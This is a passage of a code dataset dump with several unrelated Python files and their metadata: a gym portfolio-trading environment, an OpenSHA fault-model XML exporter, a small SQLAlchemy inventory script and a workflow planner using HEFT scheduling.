self._get_data_by_date(self.current_date)\n self.current_date = self._get_next_date()\n current_prices, current_news = self._get_data_by_date(self.current_date)\n obs = StockObservation(current_prices, current_news, prev_prices, self.current_date)\n self.prev_prices = current_prices.copy()\n return obs\n\n\nclass PortfolioSim(object):\n def __init__(self, asset_names=(), trading_cost=0.0025, time_cost=0.0, total_steps=260):\n self.asset_names = asset_names\n self.trading_cost = trading_cost\n self.time_cost = time_cost\n self.total_steps = total_steps\n\n def step(self, w1, y1):\n \"\"\"\n Step.\n w1 - new action of portfolio weights - e.g. [0.1,0.9,0.0]\n y1 - price relative vector also called return in this timestamp\n e.g. [1.0, 0.9, 1.1]\n Numbered equations are from https://arxiv.org/abs/1706.10059\n \"\"\"\n assert w1.shape == y1.shape, 'w1 and y1 must have the same shape.'\n assert y1[0] == 1.0, 'y1[0] must be 1'\n\n w0 = self.w0\n p0 = self.p0\n\n dw1 = (y1 * w0) / (np.dot(y1, w0) + eps) # (eq7) weights evolve into\n\n mu1 = self.trading_cost * (np.abs(dw1 - w0)).sum() # (eq16) cost to change portfolio\n\n assert mu1 < 1.0, 'Cost is larger than current holding'\n\n p1 = p0 * (1 - mu1) * np.dot(y1, w0) # (eq11) final portfolio value\n\n p1 = p1 * (1 - self.time_cost) # we can add a cost to holding\n\n rho1 = p1 / p0 - 1 # rate of returns\n r1 = np.log((p1 + eps) / (p0 + eps)) # log rate of return\n reward = r1 # (22) average logarithmic accumulated return\n # remember for next step\n self.p0 = p1\n\n # if we run out of money, we're done (losing all the money)\n done = p1 == 0\n\n self.w0 = w1 # remember the action for calculating reward at next timestamp\n\n info = {\n \"reward\": reward,\n \"log_return\": r1,\n \"portfolio_value\": p1,\n \"return\": y1.mean(),\n \"rate_of_return\": rho1,\n \"weights_mean\": w1.mean(),\n \"weights_std\": w1.std(),\n \"cost\": mu1,\n }\n self.infos.append(info)\n return reward, info, done\n\n def reset(self):\n self.infos = []\n self.p0 = 1.0\n self.w0 = np.array([1.0] + [0.0] * len(self.asset_names))\n\n\nclass PortfolioEnv(gym.Env):\n \"\"\"\n An environment for financial portfolio management.\n Financial portfolio management is the process of constant redistribution of a fund into different\n financial products.\n Based on [Jiang 2017](https://arxiv.org/abs/1706.10059)\n \"\"\"\n\n metadata = {'render.modes': ['human', 'ansi']}\n\n def __init__(self,\n pd_frame_dict,\n total_steps=260, # 1 years\n trading_cost=0.0025,\n time_cost=0.00,\n start_date=None\n ):\n \"\"\"\n An environment for financial portfolio management.\n Params:\n steps - steps in episode\n scale - scale data and each episode (except return)\n augment - fraction to randomly shift data by\n trading_cost - cost of trade as a fraction\n time_cost - cost of holding as a fraction\n window_length - how many past observations to return\n start_idx - The number of days from '2012-08-13' of the dataset\n sample_start_date - The start date sampling from the history\n \"\"\"\n self.num_stocks = len(pd_frame_dict.keys())\n\n self.src = DataGenerator(pd_frame_dict, total_steps=total_steps, start_date=start_date)\n\n self.sim = PortfolioSim(\n asset_names=pd_frame_dict.keys(),\n trading_cost=trading_cost,\n time_cost=time_cost,\n total_steps=total_steps)\n\n # openai gym attributes\n # action will be the portfolio weights from 0 to 1 for each asset\n self.action_space = gym.spaces.Box(\n 0, 1, shape=(self.num_stocks + 1,), dtype=np.float32) # include cash\n\n def step(self, action):\n \"\"\"\n 
Step the env.\n Actions should be portfolio [w0...]\n - Where wn is a portfolio weight from 0 to 1. The first is cash_bias\n - cn is the portfolio conversion weights see PortioSim._step for description\n \"\"\"\n if isinstance(action, list):\n action = np.array(action)\n\n assert isinstance(action, np.ndarray), 'Action must be a numpy array'\n\n np.testing.assert_almost_equal(\n action.shape,\n (len(self.sim.asset_names) + 1,)\n )\n\n # normalise just in case\n action = np.clip(action, 0, 1)\n\n weights = action # np.array([cash_bias] + list(action)) # [w0, w1...]\n weights /= (weights.sum() + eps)\n weights[0] += np.clip(1 - weights.sum(), 0, 1) # so if weights are all zeros we normalise to [1,0...]\n\n assert ((action >= 0) * (action <= 1)).all(), 'all action values should be between 0 and 1. Not %s' % action\n np.testing.assert_almost_equal(\n np.sum(weights), 1.0, 3, err_msg='weights should sum to 1. action=\"%s\"' % weights)\n\n observation, done1 = self.src.step()\n\n # relative price vector of last observation day (close/close)\n y1 = observation.get_close_ratio()\n y1 = np.insert(y1, 0, 1.)\n reward, info, done2 = self.sim.step(weights, y1)\n\n # calculate return for buy and hold a bit of each asset\n info['market_value'] = np.cumprod([inf[\"return\"] for inf in self.infos + [info]])[-1]\n # add dates\n info['date'] = self.current_date\n self.current_date = observation.get_current_date()\n\n self.infos.append(info)\n\n return observation, reward, done1 or done2, info\n\n def reset(self):\n self.infos = []\n self.sim.reset()\n observation = self.src.reset()\n self.current_date = observation.get_current_date()\n return observation\n\n def render(self, mode='human', close=False):\n if close:\n return\n if mode == 'ansi':\n pprint(self.infos[-1])\n elif mode == 'human':\n self.plot()\n\n def seed(self, seed=None):\n self.np_random_seed = seed\n\n def plot(self):\n # show a plot of portfolio vs mean market performance\n df_info = pd.DataFrame(self.infos)\n df_info.set_index('date', inplace=True)\n mdd = max_drawdown(df_info.rate_of_return + 1)\n sharpe_ratio = sharpe(df_info.rate_of_return)\n title = 'max_drawdown={: 2.2%} sharpe_ratio={: 2.4f}'.format(mdd, sharpe_ratio)\n df_info[[\"portfolio_value\", \"market_value\"]].plot(title=title, fig=plt.gcf(), rot=30)\n plt.show()\n\n\n# Observation wrapper for both price and news\nclass PortfolioEnvObsReshapeWrapper(gym.ObservationWrapper):\n def __init__(self, env: PortfolioEnv,\n tokenizer=BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True),\n max_seq_length=128):\n super(PortfolioEnvObsReshapeWrapper, self).__init__(env)\n self.num_news = 25\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n self.observation_space = spaces.Tuple((spaces.Box(-np.inf, np.inf, shape=(1,), dtype=np.float32),\n spaces.Box(-np.inf, np.inf, shape=(env.num_stocks, self.num_news,\n max_seq_length), dtype=np.uint32)\n ))\n\n def observation(self, observation):\n close_ratio = self.get_normalized_close_ratio(observation)\n news = observation.get_news()\n news_obs = self.tokenize_news(news)\n return (close_ratio, news_obs)\n\n def get_normalized_close_ratio(self, observation):\n close_ratio = observation.get_close_ratio()\n close_ratio = (close_ratio - 1.) 
* 100\n return close_ratio\n\n def tokenize_news(self, news):\n \"\"\"\n\n Args:\n news: a list of list of sentences\n\n Returns: idx in the current tokenizer.\n\n \"\"\"\n output = []\n for stock_news in news:\n stock_news_idx = []\n assert len(stock_news) == self.num_news, \"Number of news {} doesn't match required {}\".format(\n len(stock_news), self.num_news)\n for each_news in stock_news:\n try:\n tokens = self.tokenizer.tokenize(each_news)[:self.max_seq_length - 2]\n except:\n tokens = []\n tokens = [\"[CLS]\"] + tokens + [\"[SEP]\"]\n input_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n while len(input_ids) < self.max_seq_length:\n input_ids.append(0)\n stock_news_idx.append(input_ids)\n output.append(stock_news_idx)\n\n output = np.array(output)\n return output\n\n\n# Observation wrapper for price only and news only env\n\nclass PortfolioEnvPriceOnlyWrapper(PortfolioEnvObsReshapeWrapper):\n def __init__(self, env):\n super(PortfolioEnvPriceOnlyWrapper, self).__init__(env)\n self.observation_space = gym.spaces.Box(-np.inf, np.inf, shape=(1,), dtype=np.float32)\n\n def observation(self, observation):\n return self.get_normalized_close_ratio(observation)\n\n\nclass PortfolioEnvNewsOnlyWrapper(PortfolioEnvObsReshapeWrapper):\n def __init__(self, env: PortfolioEnv,\n tokenizer=BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True),\n max_seq_length=128):\n super(PortfolioEnvNewsOnlyWrapper, self).__init__(env, tokenizer, max_seq_length)\n self.observation_space = gym.spaces.Box(-np.inf, np.inf, shape=(env.num_stocks, self.num_news,\n max_seq_length), dtype=np.uint32)\n\n def observation(self, observation):\n news = observation.get_news()\n observation = self.tokenize_news(news)\n return observation\n\n\n# reward shaping. Only care about whether we make money or lose money instead of the actual amount.\n\nclass PortfolioRewardWrapper(gym.RewardWrapper):\n def reward(self, reward):\n if reward > 0.0:\n reward = 1\n elif reward == 0.0:\n reward = 0\n else:\n reward = -1\n\n return reward\n", "sub_path": "project/portfolio_mangement/envs/portfolio.py", "file_name": "portfolio.py", "file_ext": "py", "file_size_in_byte": 15217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.sqrt", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 21, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.std", "line_number": 21, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 28, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 53, "usage_type": "name"}, {"api_name": "pandas.Timestamp", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 163, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 163, "usage_type": 
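PortfolioSim.step above is built around two lines from Jiang 2017: the held weights drift with the price-relative vector (eq 7), and the turnover implied by that drift is charged at the trading-cost rate (eq 16). Those lines in isolation, with invented numbers:

import numpy as np

eps = 1e-8
trading_cost = 0.0025
w0 = np.array([0.2, 0.5, 0.3])  # weights chosen at the previous step (cash first)
y1 = np.array([1.0, 0.9, 1.1])  # price relatives; the cash entry is always 1.0

dw1 = (y1 * w0) / (np.dot(y1, w0) + eps)      # (eq 7) weights after the price move
mu1 = trading_cost * np.abs(dw1 - w0).sum()   # (eq 16) cost term, as computed above
print(dw1, mu1)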
"name"}, {"api_name": "numpy.abs", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 174, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "gym.Env", "line_number": 203, "usage_type": "attribute"}, {"api_name": "gym.spaces.Box", "line_number": 244, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 244, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 257, "usage_type": "attribute"}, {"api_name": "numpy.testing.assert_almost_equal", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 259, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 265, "usage_type": "call"}, {"api_name": "torchlib.common.eps", "line_number": 268, "usage_type": "name"}, {"api_name": "numpy.clip", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.testing.assert_almost_equal", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 272, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.cumprod", "line_number": 283, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 303, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "gym.ObservationWrapper", "line_number": 322, "usage_type": "attribute"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer.from_pretrained", "line_number": 324, "usage_type": "call"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer", "line_number": 324, "usage_type": "name"}, {"api_name": "gym.spaces.Tuple", "line_number": 330, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 330, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 330, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 330, "usage_type": "attribute"}, {"api_name": "gym.spaces.Box", "line_number": 331, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 331, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 331, "usage_type": "attribute"}, {"api_name": "numpy.uint32", "line_number": 332, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 372, "usage_type": "call"}, {"api_name": "gym.spaces.Box", "line_number": 381, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 381, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 381, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 381, "usage_type": "attribute"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer.from_pretrained", "line_number": 389, "usage_type": "call"}, {"api_name": 
"pytorch_pretrained_bert.BertTokenizer", "line_number": 389, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 392, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 392, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 392, "usage_type": "attribute"}, {"api_name": "numpy.uint32", "line_number": 393, "usage_type": "attribute"}, {"api_name": "gym.RewardWrapper", "line_number": 403, "usage_type": "attribute"}]} +{"seq_id": "634527960", "text": "import geopandas as gpd\nimport pandas as pd\nimport xml.etree.ElementTree as ET\nfrom xml.dom import minidom\nfrom shapely.geometry import LineString\nfrom typing import Union\nimport numpy as np\n\n\ndef calculate_dip_direction(line: LineString):\n \"\"\"\n Calculate the strike of a shapely linestring object with coordinates in NZTM,\n then adds 90 to get dip direction.\n :param line: Linestring object\n :return:\n \"\"\"\n # Get coordinates\n x, y = line.xy\n # Calculate gradient of line in 2D\n p = np.polyfit(x, y, 1)\n gradient = p[0]\n # Gradient to bearing\n bearing = 180 - np.degrees(np.arctan2(gradient, 1))\n\n # Needs to be improved... Basic method of defining quadrant\n if x[0] > x[-1]:\n bearing += 180.\n\n # Ensure strike is between zero and 360 (bearing)\n while bearing < 0:\n bearing += 360.\n\n while bearing >= 360.:\n bearing -= 360.\n\n return bearing\n\n\ndef root_mean_square(value_array: Union[np.ndarray, list, tuple]):\n \"\"\"\n Helper function to turn max and min to stdev for inclusion in XML.\n :param value_array: Differences of values (e.g. sr_min and sr_max) from mean.\n :return:\n \"\"\"\n data_array = np.array(value_array)\n assert all([data_array.size > 0, data_array.ndim == 1])\n rms = np.sqrt(np.mean(np.square(data_array)))\n return rms\n\n\n# Currently does nothing... 
Could be used to implement checks on parameters\nrequired_values = ['Depth_Best', 'Depth_Max', 'Depth_Min', 'Dip_Best',\n 'Dip_Dir', 'Dip_Max', 'Dip_Min', 'FZ_Name', 'Name', 'Number',\n 'Qual_Code', 'Rake_Best', 'Rake_Max', 'Rake_Min', 'Sense_Dom',\n 'Sense_Sec', 'Source1_1', 'Source2', 'SR_Best', 'SR_Max', 'SR_Min',\n 'geometry']\n\n\ndef fault_model_xml(fault_info: pd.Series, section_id: int, nztm_geometry: LineString):\n \"\"\"\n To generate XML element containing fault metadata from shapefile\n :param fault_info:\n :param section_id:\n :param nztm_geometry:\n :return:\n \"\"\"\n # Calculate uncertainty on slip rate and dip direction\n sr_stdev = root_mean_square(np.array([fault_info[\"SR_Max\"], fault_info[\"SR_Min\"]]) - fault_info[\"SR_Best\"])\n dip_direction = calculate_dip_direction(nztm_geometry)\n\n # Unique fault identifier\n tag_name = \"i{:d}\".format(section_id)\n # Metadata\n attribute_dic = {\"sectionId\": \"{:d}\".format(section_id),\n \"sectionName\": fault_info.Name,\n \"aveLongTermSlipRate\": \"{:.1f}\".format(fault_info[\"SR_Best\"]),\n \"slipRateStDev\": \"{:.1f}\".format(sr_stdev),\n \"aveDip\": \"{:.1f}\".format(fault_info[\"Dip_Best\"]),\n \"aveRake\": \"{:.1f}\".format(fault_info[\"Rake_Best\"]),\n \"aveUpperDepth\": \"0.0\",\n \"aveLowerDepth\": \"{:.1f}\".format(fault_info[\"Depth_Best\"]),\n \"aseismicSlipFactor\": \"0.0\",\n \"couplingCoeff\": \"1.0\",\n \"dipDirection\": \"{:.1f}\".format(dip_direction),\n \"parentSectionId\": \"-1\",\n \"connector\": \"false\"\n }\n # Initialize XML element\n fault_element = ET.Element(tag_name, attrib=attribute_dic)\n # Add sub element for fault trace\n trace_element = fault_trace_xml(fault_info.geometry, fault_info.Name)\n fault_element.append(trace_element)\n return fault_element\n\n\ndef fault_trace_xml(geometry: LineString, section_name: str, z: Union[float, int] = 0):\n trace_element = ET.Element(\"FaultTrace\", attrib={\"name\": section_name})\n ll_float_str = \"{:.4f}\"\n # extract arrays of lon and lat\n x, y = geometry.xy\n # Loop through addis each coordinate as sub element\n for x_i, y_i in zip(x, y):\n loc_element = ET.Element(\"Location\", attrib={\"Latitude\": ll_float_str.format(y_i),\n \"Longitude\": ll_float_str.format(x_i),\n \"Depth\": ll_float_str.format(z)})\n trace_element.append(loc_element)\n\n return trace_element\n\n\n# Example file; should work on whole dataset too\nshp_file = \"/Users/arh79/PycharmProjects/eq-fault-geom/data/cfm_shapefile/cfm_lower_n_island.shp\"\n\n# read in data\nshp_df = gpd.GeoDataFrame.from_file(shp_file)\n# Sort alphabetically by name\nsorted_df = shp_df.sort_values(\"Name\")\n# Reset index to line up with alphabetical sorting\nsorted_df = sorted_df.reset_index(drop=True)\n# Reproject traces into lon lat\nsorted_wgs = sorted_df.to_crs(epsg=4326)\n\n# Base XML element\nopensha_element = ET.Element(\"OpenSHA\")\n# Fault model sub element\nfm_element = ET.Element(\"FaultModel\")\nopensha_element.append(fm_element)\n\n# Loop through faults, creating XML elements\nfor i, fault in sorted_wgs.iterrows():\n # Extract NZTM line for dip direction calculation/could be done in a better way, I'm sure\n nztm_geometry_i = sorted_df.iloc[i].geometry\n # Add to XML tree\n opensha_element.append(fault_model_xml(fault, section_id=i, nztm_geometry=nztm_geometry_i))\n\n# Awkward way of getting the xml file to be written in a way that's easy to read.\nxml_dom = minidom.parseString(ET.tostring(opensha_element, encoding=\"UTF-8\", xml_declaration=True))\npretty_xml_str = 
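calculate_dip_direction in read_cfm_shp.py above reduces a trace to a straight line with np.polyfit and converts the gradient to a compass bearing; the quadrant handling is flagged as basic in the source itself. The gradient-to-bearing step on an invented trace:

import numpy as np

# Invented NZTM-style coordinates for a short fault trace.
x = np.array([0.0, 100.0, 200.0])
y = np.array([0.0, 110.0, 190.0])
gradient = np.polyfit(x, y, 1)[0]
bearing = 180 - np.degrees(np.arctan2(gradient, 1))
if x[0] > x[-1]:      # crude quadrant correction, mirroring the source
    bearing += 180.0
bearing %= 360.0      # equivalent to the source's while-loops
print(bearing)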
xml_dom.toprettyxml(indent=\" \", encoding=\"utf-8\")\n\n# Write output to file\nwith open(\"test2.xml\", \"wb\") as fid:\n fid.write(pretty_xml_str)\n", "sub_path": "src/eq_fault_geom/geomio/read_cfm_shp.py", "file_name": "read_cfm_shp.py", "file_ext": "py", "file_size_in_byte": 5395, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "shapely.geometry.LineString", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 23, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 59, "usage_type": "attribute"}, {"api_name": "shapely.geometry.LineString", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 89, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 89, "usage_type": "name"}, {"api_name": "shapely.geometry.LineString", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 96, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 97, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 97, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 103, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 103, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame.from_file", "line_number": 115, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 115, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 124, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 124, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 126, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 126, "usage_type": "name"}, {"api_name": "xml.dom.minidom.parseString", "line_number": 137, "usage_type": "call"}, {"api_name": "xml.dom.minidom", "line_number": 137, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.tostring", "line_number": 137, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 137, "usage_type": "name"}]} +{"seq_id": "30389244", "text": "from sqlalchemy import create_engine\nfrom sqlalchemy import Column,String, Integer, ForeignKey, Date\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\nimport psycopg2\nfrom datetime import date\n\n#create DB engine\ndbString = \"postgresql://postgres:root@localhost:5432/simpleInventory\"\ndb = create_engine(dbString)\n\n#What the hell is this?\nbase= declarative_base()\n\nclass Item(base):\n __tablename__='item'\n id = Column(Integer, primary_key=True)\n name= Column(String)\n #created=relationship(\"Creation\")\n\n def __init__(self,name):\n self.name=name\n\nclass 
Creation(base):\n __tablename__='creationmaster'\n id= Column(Integer, primary_key=True)\n date= Column(Date, nullable=False)\n amount= Column(Integer, nullable=False) #store as negative value if thrown or sold\n action= Column(String, nullable=False) # created,thrown or sold)\n itemId=Column(Integer, ForeignKey('item.id'))\n item = relationship('Item',backref=\"created\")\n \n def __init__(self,date,amount,action,item):\n self.date=date\n self.amount=amount\n self.action=action\n self.item=item\n \n\nSession = sessionmaker(db)\nsession = Session()\n\nbase.metadata.create_all(db)\n\neggMuffin = Item(\"Egg\")\neggMuffinCreation=Creation(date(2022,8,1),7,\"New\",eggMuffin)\n\nsession.add(eggMuffin)\nsession.add(eggMuffinCreation)\nsession.commit()\nsession.close()", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 17, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 26, "usage_type": "argument"}, {"api_name": "datetime.date", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Date", "line_number": 27, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 29, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "654304183", "text": "import sys\nimport logging\nfrom enum import Enum\n# sys.path.append(path.abspath('../../shadow'))\n\nfrom topsim.core.task import Task\n\nfrom shadow.models.workflow import Workflow as ShadowWorkflow\nfrom shadow.models.environment import Environment as ShadowEnvironment\nfrom shadow.algorithms.heuristic import heft as shadow_heft\n\n\n\nlogger = logging.getLogger(__name__)\n\n# BUFFER_OFFSET = config_data.buffer_offset\n# from core.telescope import Observation\n\n\nclass Planner(object):\n\t\"\"\"\n\tThe Planner is our interface with static scheduling algorithms. It provides\n\tan interface to other libraries and selects the library based on the provided\n\talgorithms based to the _init_. 
Currently, the SHADOW library is the only\n\tlibrary that the Planner is aligned with; this may change in the future.\n\t\"\"\"\n\n\tdef __init__(self, env, algorithm, cluster):\n\t\tself.env = env\n\t\tself.cluster = cluster\n\t\t# self.envconfig = envconfig\n\t\tself.algorithm = algorithm\n\n\tdef run(self, observation):\n\t\t# wfid = observation.name\n\t\tobservation.plan = self.plan(observation.name, observation.workflow,\n\t\t\t\t\t\t\t\t\t self.algorithm)\n\t\tyield self.env.timeout(0)\n\n\tdef plan(self, name, workflow, algorithm):\n\t\tworkflow = ShadowWorkflow(workflow)\n\t\tavailable_resources = self.cluster_to_shadow_format()\n\t\tworkflow_env = ShadowEnvironment(available_resources, dictionary=True)\n\t\tworkflow.add_environment(workflow_env)\n\t\tplan = WorkflowPlan(name, workflow, algorithm, self.env)\n\t\treturn plan\n\n\tdef cluster_to_shadow_format(self):\n\t\t\"\"\"\n\t\tGiven the cluster, select from the available resources to allocate\n\t\tand create a dictionary in the format required for shadow.\n\t\t:return: dictionary of machine requirements\n\t\t\"\"\"\n\t\tsdict = {}\n\t\t# \"flops\": 84,\n\t\t# \"rates\": 10\n\t\t# \"costs\": 0.7\n\t\tavailable_resources = self.cluster.available_resources\n\t\tdictionary = {\n\t\t\t\"system\": {\n\t\t\t\t\"resources\": None,\n\t\t\t\t\"bandwidth\": self.cluster.system_bandwidth\n\t\t\t}\n\t\t}\n\t\tresources = {}\n\t\tfor m in available_resources:\n\t\t\tresources[m.id] = {\n\t\t\t\t\"flops\": m.cpu,\n\t\t\t\t\"rates\": m.bandwidth,\n\t\t\t\t\"io\": m.disk,\n\t\t\t\t\"memory\": m.memory\n\t\t\t}\n\t\tdictionary['system']['resources'] = resources\n\n\t\treturn dictionary\n\n# for machine in available_resources:\n\n\nclass WorkflowStatus(int, Enum):\n\tUNSCHEDULED = 1\n\tSCHEDULED = 2\n\tON_TIME = 3\n\tDELAYED = 4\n\tFINISHED = 5\n\n\nclass WorkflowPlan(object):\n\t\"\"\"\n\tWorkflowPlans are used within the Planner, Scheduler Actors and Cluster Resource. They are higher-level than the\n\tshadow library representation, as they are a storage component of scheduled tasks, rather than directly representing\n\tthe DAG nature of the workflow. 
This is why the tasks are stored in queues.\n\t\"\"\"\n\n\tdef __init__(self, wid, workflow, algorithm, env):\n\t\tself.id = wid\n\t\tif algorithm == 'heft':\n\t\t\tself.solution = shadow_heft(workflow)\n\t\telse:\n\t\t\tsys.exit(\"Other algorithms are not supported\")\n\n\t\t# DO Task execution things here\n\t\ttaskid = 0\n\t\tast = 1\n\t\taft = 2\n\t\tself.tasks = []\n\t\ttask_order = []\n\n\t\t# The solution object is now how we get information on allocations from SHADOW\n\n\t\tfor task in self.solution.task_allocations:\n\t\t\tallocation = self.solution.task_allocations.get(task)\n\t\t\ttaskobj = Task(task.tid, env)\n\t\t\ttaskobj.est = allocation.ast\n\t\t\ttaskobj.eft = allocation.aft\n\t\t\ttaskobj.duration = taskobj.eft - taskobj.est\n\t\t\ttaskobj.machine_id = allocation.machine\n\t\t\ttaskobj.flops = task.flops_demand\n\t\t\ttaskobj.pred = list(workflow.graph.predecessors(task))\n\t\t\tself.tasks.append(taskobj)\n\t\tself.tasks.sort(key=lambda x: x.est)\n\t\tself.exec_order = self.solution.execution_order\n\t\tself.start_time = None\n\t\tself.priority = 0\n\t\tself.status = WorkflowStatus.UNSCHEDULED\n\t\tself.delayed = None\n\n\tdef __lt__(self, other):\n\t\treturn self.priority < other.priority\n\n\tdef __eq__(self, other):\n\t\treturn self.priority == other.priority\n\n\tdef __gt__(self, other):\n\t\treturn self.priority > other.priority\n\n\n\n", "sub_path": "topsim/core/planner.py", "file_name": "planner.py", "file_ext": "py", "file_size_in_byte": 3836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "shadow.models.workflow.Workflow", "line_number": 41, "usage_type": 